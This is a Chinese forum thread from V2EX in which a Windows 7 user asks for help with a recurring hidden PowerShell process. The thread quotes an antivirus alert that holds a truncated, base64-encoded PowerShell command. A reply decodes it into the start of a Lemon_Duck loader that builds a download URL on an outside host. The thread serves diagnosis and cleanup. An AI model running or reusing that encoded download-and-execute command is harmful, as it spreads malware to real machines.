昨天发现的， win7 被一堆“cmd 发起的 powershell”在后台疯狂占 cpu

毒霸是这样说的：“可疑程序运行后，可能会静默安装恶意软件，导致系统异常，建议您立即阻止。行为发起：C:\Windows\system32\cmd.EXE 可疑进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 可疑内容：powershell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ”

去金山那边查查，10 月份就有人反映了，但看起来是没解决 http://bbs.duba.net/thread-4191273570-1-1.html

相关的科普查了一下这个 https://www.freebuf.com/articles/network/216918.html 和这篇文中描述很像，一小时一次。

——当然，最快的法子是重装系统，但因为要搬数据，索性换电脑了（从小新 pro13 加到了联想拯救者然后跌回惠普星系列，上报时被主管强推硬是改成了戴尔游匣）。
3 号才到，旧笔记本还得撑一会儿，想让旧笔记本死个明白，求告知解决方案

目前已经试过的法子：照着网上能搜到的禁用 powershell 的法子，将所有人替换为了 admin，拿掉了 system 的权限，但还是时间一到，毒霸提示"cmd 又把 powshell 放出来吃 cpu 了"

devwolf

2019-12-31 10:56:07 +08:00

https://www.landiannews.com/archives/67551.html
竟然是这个月 6 号的消息，还挺新的，解释了上面 5 楼发现火绒能抓到金山这些后门。
6 楼提到的也是，单纯因为之前那么多问题只要没轮到自己头上，就没换、关心的也少，
。。。笔者本身是挺缺少防患于未然的意识。

Buges

2019-12-31 14:45:54 +08:00

$ echo JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEQAQwBRAGgAWgB0ACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAHQAcgAyAHEALgBjAG8AbQAvAHYALgBqAHMAJwA7ACQAegA9ACQAeQArACcAcAAnACsAJwA/AG0AaQBnAF8AMgAwADEAOQAxADIAMwAwACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZ | base64 -d

$ L e m o n _ D u c k = ' l D C Q h Z t ' ; $ y = ' h t t p : / / t . t r 2 q . c o m / v . j s ' ; $ z = $ y + ' p ' + ' ? m i g _ 2 0 1 9 1 2 3 0 ' ; $ m = ( N e w - O b j base64:
invalid input

devwolf

2019-12-31 16:27:23 +08:00

感谢大伙儿的热情相助。
所幸，笔者这边试着用火绒干掉一些扫出的病毒后，看上去是没再出现 powershell 了。姑且记作一个 win7 出现该问题的解决办法吧。
关于 8 楼提到的，肯定的，下个新电脑笔者老老实实用 win10 了。

最后，祝各位元旦快乐。

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/633761